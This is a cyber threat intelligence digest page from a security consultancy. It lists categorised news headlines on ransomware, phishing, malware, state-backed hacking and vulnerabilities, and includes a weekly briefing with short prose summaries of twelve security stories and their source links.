Why Are Hospital Ransomware Attacks Becoming More Frequent Globally? The UN Met to Discuss | HackerNoon

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

No company too small for Phobos ransomware gang, indictment reveals | Malwarebytes

Storm-1811 exploits RMM tools to drop Black Basta ransomware

Ransomware attacks on critical sectors ramped up in November | TechTarget

Hackers are pivoting from data breaches to business shutdowns

Wanted Russian Hacker Linked to Hive and LockBit Ransomware Arrested

Ransomware's Grip on Healthcare

Ransomware Costs Manufacturing Sector $17bn in Downtime - Infosecurity Magazine

Ransomware Victims

UK hospital resorts to paper and postpones procedures after cyber attack

Alder Hey Children’s Hospital confirms hackers gained access to patient data through digital gateway service | ITPro

Arrowe Park: 'Longer A&E wait times' continue after cyber attack - BBC News

Cyber attack hits three NHS Liverpool hospitals | UKAuthority

British telecoms giant BT confirms attempted cyber attack after ransomware gang claims hack | The Record from Recorded Future News

Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra

Ransomware Attack Disrupts Operations at US Contractor ENGlobal - Infosecurity Magazine

Bologna FC Hit By 200GB Data Theft and Ransom Demand - Infosecurity Magazine

Stoli Vodka and Kentucky Owl File for Bankruptcy Following Cyber Attack, Russian Seizures | NTD

Vodka maker Stoli files for bankruptcy in US after ransomware attack

Italian football club Bologna FC says company data stolen during ransomware attack | The Record from Recorded Future News

Phishing & Email Based Attacks

Novel phishing campaign uses corrupted Word documents to evade security

Corrupted Word Files Fuel Sophisticated Phishing Campaign - Infosecurity Magazine

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

Hackers Use Corrupted ZIPs and Office Docs to Evade Antivirus and Email Defences

Nearly half a billion emails to businesses contain malicious content, Hornetsecurity report finds

KnowBe4 Releases the Latest Phishing Trends Report

GenAI makes phishing attacks more believable and cost-effective - Help Net Security

New Rockstar 2FA phishing service targets Microsoft 365 accounts

North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks

HR and IT are among top-clicked phishing subjects

Top Five Industries Aggressively Targeted By Phishing Attacks

Don't Fall For This "Sad Announcement" Phishing Scam

Defending Against Email Attachment Scams - Security Boulevard

Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

This sneaky phishing attack is a new take on a dirty old trick | PCWorld

Phishing attacks rose by more than 600% in the buildup to Black Friday | Security Magazine

Other Social Engineering

Why You Must Beware Of Dangerous New Scam-Yourself Cyber Attacks

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

Spotting the Charlatans: Red Flags for Enterprise Security Teams - SecurityWeek

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Artificial Intelligence

GenAI makes phishing attacks more believable and cost-effective - Help Net Security

Cyber criminals already using AI for most types of scams, FBI warns | Cybernews

How laws strain to keep pace with AI advances and data theft | ZDNET

FBI Warns GenAI is Boosting Financial Fraud - Infosecurity Magazine

Teenagers leading new wave of cyber crime - Help Net Security

Cyber security professionals call for AI regulations

Cyber security in 2025: AI threats & zero trust focus

Do Macs get viruses? The answer is yes – and AI-powered malware is a growing threat, new report claims | TechRadar

Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat

Treat AI like a human: Redefining cyber security - Help Net Security

AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

25% of enterprises using AI will deploy AI agents by 2025 | ZDNET

The role of artificial intelligence in fostering multifaceted cooperation among BRICS nations - Africa Policy Research Institute (APRI)

2FA/MFA

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

Malware

North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks

Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica

Venom Spider Spins Web of MaaS Malware

Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels

Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

New Windows Backdoor Security Warning For Bing, Dropbox, Google Users

Do Macs get viruses? The answer is yes – and AI-powered malware is a growing threat, new report claims | TechRadar

More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader

Widespread RAT compromise via bogus emails, JavaScript payloads detailed | SC Media

SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine

ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan

Security Bite: Threat actors are widely using AI to build Mac malware - 9to5Mac

MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks | Trend Micro (US)

'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims

Mobile

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

SMEs put at risk by poor mobile security practices

New DroidBot Android malware targets 77 banking, crypto apps

Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

The FBI now says encryption is good for you – Computerworld

NSO Group's Pegasus Spyware Detected in New Mobile Devices

Business leaders among Pegasus spyware victims, says security firm | TechCrunch

Smartphone Security Warning—Make Changes Now Or Become A Victim

Many small businesses are falling well short when it comes to cyber security plans | TechRadar

Top 5 Mobile Security Risks for Enterprises - Zimperium

Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges

This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena

Banking apps can now require recent Android security updates

Denial of Service/DoS/DDoS

Misconfigured WAFs Heighten DoS, Breach Risks

How DDoS attacks are shaping esports security and risk management | Insurance Business America

Internet of Things – IoT

From Patchwork to Framework: Towards a Global IoT Security Paradigm - Infosecurity Magazine

Chinese LIDAR Dominance a Cyber Security Threat, Warns Think Tank - Infosecurity Magazine

Data Breaches/Leaks

Russian hacking software used to steal hundreds of MoD log-ins

760,000 Employee Records From Several Major Firms Leaked Online - SecurityWeek

Over 600,000 people hit in massive data breach — background checks, vehicle and property records | Tom's Guide

Sadiq Khan admits some commuters may never be refunded after TfL cyber attack

Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online

White FAANG Data Export Attack: A Gold Mine for PII Threats

63% of companies plan to pass data breach costs to customers | CSO Online

Deloitte Hacked - Brain Cipher Group Allegedly Stole 1 TB of Data

Process over top-down enforcement: prevent data leaks

Lessons in cyber security from the Internet Archive Breaches | TechRadar

Cyber attack on debt acquisition firm Cabot involved theft of 394,000 data files, court hears – DataBreaches.Net

AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

Major USAID contractor Chemonics says 263,000 affected by 2023 data breach | The Record from Recorded Future News

Israeli tech firm Silicom denies Iranian claims of Mossad and Unit 8200 links after c | Ctech

Controversial Andrew Tate ‘War Room’ Videos Leaked By Hackers

Organised Crime & Criminal Actors

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

How laws strain to keep pace with AI advances and data theft | ZDNET

Cyber crime | At least 20% cyber crimes involve dark web usage by attackers: Report - Telegraph India

UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine

Alleged Snowflake Hacker ‘Danger’ to the Public

Russia gives life sentence to Hydra dark web kingpin • The Register

Venom Spider Spins Web of MaaS Malware

Teenagers leading new wave of cyber crime - Help Net Security

Cyber criminals already using AI for most types of scams, FBI warns | Cybernews

German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine

Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown

Eurocops red pill the Matrix 'secure' criminal chat systems • The Register

Police seizes largest German online crime marketplace, arrests admin

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers

Scattered Spider Hacking Gang Arrests Mount with California Teen

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Hackers Stole $1.49 Billion in Cryptocurrency to Date in 2024 - SecurityWeek

How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

New DroidBot Android malware targets 77 banking, crypto apps

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Record-Breaking $2 Million Bounty Offered To Crypto.com Hackers

Insider Risk and Insider Threats

65% of employees bypass cyber security policies, driven by hybrid work and flexible access

Inside threats: How can companies improve their cyber hygiene?

Insider Threats vs. Privacy: A Dilemma for IT Professionals

Process over top-down enforcement: prevent data leaks

Macy’s found a single employee hid up to $154 million worth of expenses | CNN Business

Insurance

Does Cyber Insurance Drive Up Ransom Demands?

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Cyber insurance checklist: 12 must-have security features | SC Media

Why your cyber insurance may not cover everything: Finding and fixing blind spots | SC Media

Supply Chain and Third Parties

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar

Blue Yonder Confirms Reports of Recent Ransomware Attack | Console and Associates, P.C. - JDSupra

Hardening Links in Supply Chain Security | SC Media UK

Fear of cyber attack outweighs investment in security along the supply chain - The Loadstar

Cloud/SaaS

This worrying new phishing attack is going after Microsoft 365 accounts | TechRadar

This New Microsoft 365 Attack Can Break Through Your 2FA: Here's How

CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media

New Rockstar 2FA phishing service targets Microsoft 365 accounts

5 things you should never back up to the cloud

New Windows Backdoor Security Warning For Bing, Dropbox, Google Users

7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments

Outages

Re/insurance market must prepare for Single Point of Failure tech outage events: CyberCube - Reinsurance News

Identity and Access Management

The New Cyber Frontier: Managing Risks in Distributed Teams - Infosecurity Magazine

7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments

Encryption

The Growing Quantum Threat to Enterprise Data: What Next?

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

The FBI now says encryption is good for you – Computerworld

This is why the FBI is warning iOS users not to text Android users and vice versa - PhoneArena

Linux and Open Source

70% of open-source components are poorly or no longer maintained - Help Net Security

Code found online exploits LogoFAIL to install Bootkitty Linux backdoor - Ars Technica

New Report Highlights Open Source Trends And Security Challenges

Passwords, Credential Stuffing & Brute Force Attacks

Hundreds of UK Ministry of Defence passwords found circulating on the dark web | CSO Online

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

Six password takeaways from the updated NIST cybersecurity framework

Microsoft's Vasu Jakkal on how gen AI is redefining cyber security | VentureBeat

Social Media

Tech Support Scams Exploit Google Ads to Target Users | Tripwire

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian

Malvertising

Tech Support Scams Exploit Google Ads to Target Users | Tripwire

Regulations, Fines and Legislation

How laws strain to keep pace with AI advances and data theft | ZDNET

EC takes action as member states miss NIS2 directive deadline

NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News

6 Considerations to Determine if a Cyber Incident Is Material | Troutman Pepper - JDSupra

DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra

An Overview of the NIS2 Directive and Its Implementation in France and Luxembourg | Goodwin - JDSupra

New EU Regulation Establishes European 'Cyber Security Shield' - SecurityWeek

Cyber Security: Council of EU formally adopts Cybersecurity and Cyber Solidarity Act | Practical Law

Cyber security professionals call for AI regulations

Navigating the Changing Cyber Security Regulations Landscape

Employees suffering compliance and security fatigue | theHRD

Models, Frameworks and Standards

EC takes action as member states miss NIS2 directive deadline

NIS2 still a mystery to cyber security bosses, research shows - Data Centre & Network News

New NIST Guidance Offers Update on Gauging Cyber Performance

DORA Demystified: Dispelling 5 Myths for ICT Service Providers | Morrison & Foerster LLP - JDSupra

An Overview of the NIS2 Directive and Its Implementation in France and Luxembourg | Goodwin - JDSupra

Six password takeaways from the updated NIST cybersecurity framework

Careers, Working in Cyber and Information Security

Human Intelligence is the Key to Combating the UK’s Cyber Skills Crisis | SC Media UK

Optimism About Cyber Workforce Advancements | AFCEA International

World Wide Work: Landing a Cyber Security Career Overseas

Law Enforcement Action and Take Downs

INTERPOL Arrests 5,500 in Global Cyber Crime Crackdown, Seizes Over $400 Million

Alleged Snowflake Hacker ‘Danger’ to the Public

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

German Police Shutter Country’s Largest Dark Web Market - Infosecurity Magazine

Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown

50 Servers Linked to Cyber Crime Marketplace and Phishing Sites Seized by Law Enforcement - SecurityWeek

US arrests Scattered Spider suspect linked to telecom hacks

UK Justice System Failing Cyber Crime Victims, Cyber Helpline Finds - Infosecurity Magazine

Misinformation, Disinformation and Propaganda

German intelligence launches task force to combat foreign election interference | The Record from Recorded Future News

Cyber Attacks Could Impact Romanian Presidential Race, Officials Claim - Infosecurity Magazine

German intelligence agency warns of 'foreign interference' in upcoming elections

Meta says it has taken down about 20 covert influence operations in 2024 | Meta | The Guardian

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Cyberwarfare 2025: The rise of AI weapons, zero-days, and state-sponsored chaos

Cyber warfare rising across EU in bid to 'destabilise' member states

NATO promises better strategy against cyber attacks and undersea cables – Euractiv

NCSC head warns of fundamental ‘contest for cyber space’ as annual report shows 44% hike in most serious incidents – PublicTechnology

UK Underestimates Threat Of Cyber-Attacks, NCSC | Silicon UK

German intelligence launches task force to combat foreign election interference | The Record from Recorded Future News

Nation State Actors

China

Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks

US government says Salt Typhoon is still in telecom networks | CyberScoop

FBI Tells Telecom Firms to Boost Security Following Wide-Ranging Chinese Hacking Campaign - SecurityWeek

Microsoft spots another China spy crew stealing US data • The Register

US org suffered four month intrusion by Chinese hackers

What is Salt Typhoon? Everything you need to know about 'the worst telecom hack in [US] history' | Mashable

FBI and CISA say to use encrypted messengers as Chinese hackers attack networks | Cybernews

Australia, Canada, New Zealand, and the US warn of PRC-linked cyber espionage targeting telecom networks

Government Guidance on Chinese Telco Hacking Highlights Threat to Cisco Devices - SecurityWeek

The FBI now says encryption is good for you – Computerworld

US shares tips to block hackers behind recent telecom breaches

White House says at least 8 US telecom firms, dozens of nations impacted by China hacking campaign - ABC News

T-Mobile CSO: Cyber spies' initial access method 'is novel' • The Register

US critical infrastructure, military at risk of Chinese LiDAR tech compromise | SC Media

MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks | Trend Micro (US)

Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024

Romania to recount votes as TikTok slammed for election role | Stars and Stripes

SmokeLoader Malware Campaign Targets Companies in Taiwan - Infosecurity Magazine

Russia

The UK is 'widely' underestimating online threats from hostile states and criminals, cyber security chief warns | UK News | Sky News

Russia is exploiting UK’s dependence on technology to cause ‘maximum destruction’, warns GCHQ | The Independent

NATO promises better strategy against cyber attacks and undersea cables – Euractiv

NCSC head warns of fundamental ‘contest for cyber space’ as annual report shows 44% hike in most serious incidents – PublicTechnology

‘Russia can turn the lights off’: how the UK is preparing for cyberwar | Cyberwar | The Guardian

Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

Germany’s cyber security and infrastructure under attack by Russia, chancellor says – POLITICO

Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

NCA Disrupts Multi-Billion Dollar Russian Money Laundering Network

Russian money laundering networks uncovered linking narco traffickers, ransomware gangs and Kremlin spies | The Record from Recorded Future News

She Was a Russian Socialite and Influencer. Cops Say She’s a Crypto Laundering Kingpin | WIRED

Finland: Outage reported after fiber optic cable damaged – DW – 12/03/2024

Russian programmer says FSB agents planted spyware on his Android phone | TechCrunch

Spy v Spy: Russian APT Turla Caught Stealing From Pakistani APT - SecurityWeek

Russian Hacker With $10 Million Bounty on His Head Reportedly Arrested - SecurityWeek

Ransomware suspect Wazawaka reportedly arrested by Russia | The Record from Recorded Future News

Russia gives life sentence to Hydra dark web kingpin • The Register

Putin and ransomware blamed for Stoli US bankruptcy filing • The Register

'Horns&Hooves' Malware Campaign Hits Over 1,000 Victims

Romania's election systems targeted in over 85,000 cyber attacks

Agent for Russia and UK-based Bulgarian planned ‘honeytrap’ for journalist, court hears | UK news | The Guardian

Russian hacking software used to steal hundreds of MoD log-ins

Iran

Kash Patel, Trump's pick to lead FBI, hit with Iranian cyber attack, sources say - ABC News

North Korea

North Korean Hacking Group Launches Undetected Malwareless URL Phishing Attacks

How North Korean hackers stole billions in crypto while posing as VCs, IT workers – Firstpost

North Korea deploying fake IT workers and hackers to target UK firms, cryptocurrency,... - LBC

How North Korean Hackers Pilfered $16 Million From A Crypto Exchange Via LinkedIn

North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

Kimsuky Group Adopts New Phishing Tactics to Target Victims - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe - Infosecurity Magazine

Polish Central Banker Testifies in Pegasus Spyware Case – BNN Bloomberg

How widespread is mercenary spyware? More than you think - Help Net Security

Study shows potentially higher prevalence of spyware infections than previously thought | CyberScoop

NSO Group's Pegasus Spyware Detected in New Mobile Devices

Business leaders among Pegasus spyware victims, says security firm | TechCrunch

A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus Infections | WIRED

How a Russian man’s harrowing tale shows the physical dangers of spyware | CyberScoop

Vulnerability Management

Microsoft Warns 400 Million PC Owners—This Ends Your Windows Updates

70% of open-source components are poorly or no longer maintained - Help Net Security

Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar

Want to Grow Vulnerability Management into Exposure Management? Start Here!

Vulnerabilities

Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) - Help Net Security

Cisco ASA flaw CVE-2014-2120 is being exploited in the wild

Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek

Bootloader Vulnerability Impacts Over 100 Cisco Switches - SecurityWeek

Critical Vulnerability Found in Zabbix Network Monitoring Tool - SecurityWeek

CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media

Cisco Warns of Exploitation of Decade-Old ASA WebVPN Vulnerability

CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel

TP-Link Archer Zero-Day Vulnerability Let Attackers Inject Malicious Commands

Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access

PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) - Help Net Security

CISA Warns of Zyxel Firewall Vulnerability Exploited in Attacks - SecurityWeek

Japan warns of IO-Data zero-day router flaws exploited in attacks

Rather than fixing its old routers, D-Link is telling customers to upgrade

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 29 November 2024

Black Arrow Cyber Threat Intelligence Briefing 29 November 2024:

-Phishing Attacks Dominate Threat Landscape in Q3 2024

-Rising Cyber Threat Driven by Single Point of Failure Risk

-Cloned Customer Voice Beats Bank Security Checks

-Avoiding Cyber Complacency as a Small Business

-Your IT Infrastructure May Be More Outdated Than You Think

-Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey

-83% of Organisations Reported Insider Attacks in 2024

-Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US

-North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

-UK Scam Losses Surge 50% Annually to £11.4bn

-In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security

-Russian Threat Actors Poised to Cripple Power Grid, UK Warns

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Phishing Attacks Dominate Threat Landscape in Q3 2024

ReliaQuest's recent report reveals that spear phishing attacks accounted for 46% of security incidents in Q3 2024, becoming the most prevalent threat. High employee turnover and accessible phishing kits contribute to this trend, with untrained new hires increasing vulnerability. The report also highlights a 20% surge in cloud-based security threats and a 7% rise in insider threat activity, with cyber criminals offering up to $10,000 weekly for insider assistance. Despite awareness of these risks, organisations continue to face significant challenges in mitigating them.

Rising Cyber Threat Driven by Single Point of Failure Risk

CyberCube reports that escalating cloud service provider outages and single point of failure events are significantly increasing the risk of unplanned technology outages for organisations. These disruptions are accelerating, impacting critical services across sectors. The report highlights that the Energy & Utilities industry is highly exposed with varying security levels, while the Transportation & Logistics sector is exposed but more secure. Many US public sector entities are under-secured despite high exposure to cyber threats. It emphasises that insurers must adapt by refining policy language, enhancing threat intelligence, and collaborating with governments to mitigate these evolving risks.

Cloned Customer Voice Beats Bank Security Checks

Recent investigations have revealed that AI-cloned voices can bypass voice recognition security in banking systems. A BBC test showed that cloned voices successfully overcame voice ID checks at major banks, including Santander and Halifax. Despite assurances from banks about the security of voice ID, the ease with which these systems were breached, even using basic equipment, highlights significant vulnerabilities. Cyber security experts warn that the rapid advancement of generative AI presents new risks to biometric authentication methods. This raises concerns about the effectiveness of current security measures and underscores the need for enhanced protections against sophisticated AI-enabled fraud.

Avoiding Cyber Complacency as a Small Business

A recent survey revealed that half of all UK businesses, including many small and medium-sized enterprises, experienced a cyber attack in the past year. Despite this high incidence, only 22% have a formal incident response plan, indicating widespread cyber complacency. With the average cost to remedy an attack estimated at £21,000, small businesses are at significant financial risk. Many maintain outdated security measures and prioritise other concerns due to limited resources. To mitigate these risks, organisations are advised to stay vigilant, educate employees on threats like phishing, implement robust backup solutions, and develop clear disaster recovery plans.

Your IT Infrastructure May Be More Outdated Than You Think

Kyndryl's recent survey reveals a significant disconnect between CEOs and IT leaders regarding IT infrastructure readiness. While about two-thirds of CEOs are concerned their IT systems are outdated or nearing end-of-life, 90% of IT leaders believe their infrastructure is best in class. Yet only 39% of IT leaders feel prepared to manage future risks and disruptions, and 44% of executives admit their IT systems have aged past their expected lifespans. The report underscores the need for continual reassessment of IT tools to balance operational needs with innovation, as outdated systems can quickly hinder an organisation's competitiveness.

Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey

Howden's research has revealed that cyber attacks have cost UK businesses £44 billion in lost revenue over the past five years. Over half of these businesses, particularly those with revenues over £100 million, have suffered at least one cyber attack, with compromised emails and data theft being the most common causes. Despite this significant impact, the uptake of basic cyber security measures remains low, with only 61% using antivirus software and 55% employing network firewalls. The report suggests that implementing fundamental cyber security practices could reduce cyber attack costs by up to 75%, saving approximately £30 billion over five years.

83% of Organisations Reported Insider Attacks in 2024

A publication by news site Cybersecurity Insiders reports that 83% of organisations experienced at least one insider attack in the past year. The incidence of insider threats has escalated, with the percentage of organisations facing between 11 and 20 attacks increasing from 4% to 21% in the last 12 months. Despite 93% recognising the importance of strict visibility and control, only 36% have effective solutions in place. Recovery costs are significant, with 32% of organisations spending between $100,000 and $499,000, and 21% facing costs between $1 million and $2 million. Lack of employee awareness is a major factor, with 32% citing it as a contributor to attacks.

Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US

Blue Yonder, a supply chain software company, has experienced a ransomware attack that disrupted services for major clients. The incident impacted key customers, including Starbucks and leading UK supermarkets like Morrisons and Sainsbury's, causing operational disruptions and forcing activation of contingency plans. Despite working with external cyber security experts, Blue Yonder has yet to provide a timeline for restoration. This event underscores the increasing vulnerability of supply chains to cyber attacks. A recent survey found that 62% of organisations faced ransomware attacks from software supply chain partners in the past year, highlighting the widespread nature of these threats.

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Microsoft has reported that North Korean hackers have stolen over $10 million in cryptocurrency through sophisticated social engineering campaigns on LinkedIn. These cyber security threats are escalating, with attackers posing as recruiters or venture capitalists to trick targets into downloading malware. Despite increased awareness, organisations remain vulnerable as hackers use artificial intelligence tools to create convincing fake profiles and documents. North Korean IT workers abroad have also generated at least $370,000 through legitimate work, but pose additional risks by abusing access to steal intellectual property and demand ransoms.

UK Scam Losses Surge 50% Annually to £11.4bn

Cifas reports that UK online fraud losses have surged to over £11bn in the past year, a £4bn increase from the previous year. 15% of the 2,000 survey participants lost money to scammers in 2024, up from 10% in 2023, with average losses of £1,400 per victim. Less than a fifth recovered their money, and only 28% reported the incidents to the police. Email was the most common fraud channel, cited by nearly 70% of respondents. With scams expected to intensify during the holiday season, there is a pressing need for improved security measures and cross-sector collaboration.

In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security

Enterprises are facing a more sophisticated threat landscape due to digital transformation, hybrid work, and AI adoption, making it imperative to prioritise cyber security. Leadership at the C-suite and board level must drive this change by investing appropriately, as underfunded security can lead to lost revenue and legal issues. A strong, empowered CISO is crucial for identifying vulnerabilities and guiding necessary actions. Adopting frameworks like NIST Cybersecurity Framework 2.0 helps organisations manage risks effectively, promoting prevention and response strategies that can also reduce liability in the event of a breach.

Russian Threat Actors Poised to Cripple Power Grid, UK Warns

The UK government warns that Russian cyber threat actors are poised to conduct cyber attacks that could disrupt critical national infrastructure, potentially "turning off the lights for millions". These threats have already targeted UK media, telecoms, and political institutions. However, experts caution that such rhetoric may overstate Russia's actual capabilities and risk causing unnecessary panic. In response, the government is investing £8.22 million in a new AI cyber lab to bolster national security and an additional £1 million to enhance incident response among allies.

Sources:

https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/

https://www.emergingrisks.co.uk/rising-cyber-threat-driven-by-single-point-of-failure-risk/

https://www.bbc.co.uk/news/articles/c1lg3ded6j9o

https://betanews.com/2024/11/28/avoiding-cyber-complacency-as-a-small-business/

https://www.cio.com/article/3610867/your-it-infrastructure-may-be-more-outdated-than-you-think.html

https://www.insurancejournal.com/news/international/2024/11/27/802913.htm

https://securityintelligence.com/articles/83-percent-organizations-reported-insider-threats-2024/

https://www.techmonitor.ai/technology/cybersecurity/blue-yonder-ransomware-attack-disrupts-supply-chains-across-uk-and-us

https://thehackernews.com/2024/11/north-korean-hackers-steal-10m-with-ai.html

https://www.infosecurity-magazine.com/news/uk-scam-losses-surge-50-annually/

https://securityboulevard.com/2024/11/in-a-growing-threat-landscape-companies-must-do-three-things-to-get-serious-about-cybersecurity/

https://www.computerweekly.com/news/366616324/Russian-threat-actors-poised-to-cripple-power-grid-UK-warns

Threats

Ransomware, Extortion and Destructive Attacks

Five Ransomware Groups Responsible for 40% of Cyber-Attacks in 2024 - Infosecurity Magazine

One of the nastiest ransomware groups around may have a whole new way of doing things | TechRadar

VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks

CISA says BianLian ransomware now focuses only on data theft

The case for a ransomware payment ban - Tech Monitor

Growth in phishing, changes in ransomware crews mark threat landscape | SC Media

Fresh warning issued over encryption-less ransomware as notorious threat group shifts tactics | ITPro

Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine

Ransomware payments are now a critical business decision - Help Net Security

Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert

BlackBasta Ransomware Brand Picks Up Where Conti Left Off

CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media

Mimic Ransomware: What You Need To Know | Tripwire

Zyxel firewalls targeted in recent ransomware attacks

Victims Must Disclose Ransom Payments Under Australian Law

Ransomware Victims

Microlise Confirms Data Breach as Ransomware Group Steps Forward - SecurityWeek

Blue Yonder ransomware attack disrupts supply chains across UK and US

Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack

Supply chain vendor Blue Yonder succumbs to ransomware • The Register

'Real threat' still posed by hackers says council subject to devastating cyber attack four years ago - Teesside Live

NHS declares major cyber incident for third time this year • The Register

Further disruption expected after latest NHS cyber attack | Computer Weekly

Phishing & Email Based Attacks

Business Email Compromise Scams: What They Are, and How to Avoid Them | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Phishing Attacks Dominate Threat Landscape In Q3 2024

Email Phishing and DMARC Statistics - Security Boulevard

Growth in phishing, changes in ransomware crews mark threat landscape | SC Media

Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase

Rise in phishing attacks observed from August to October 2024

Flying Under the Radar - Security Evasion Techniques

Phishing attacks via ‘URL rewriting’ to evade detection escalate | SC Media

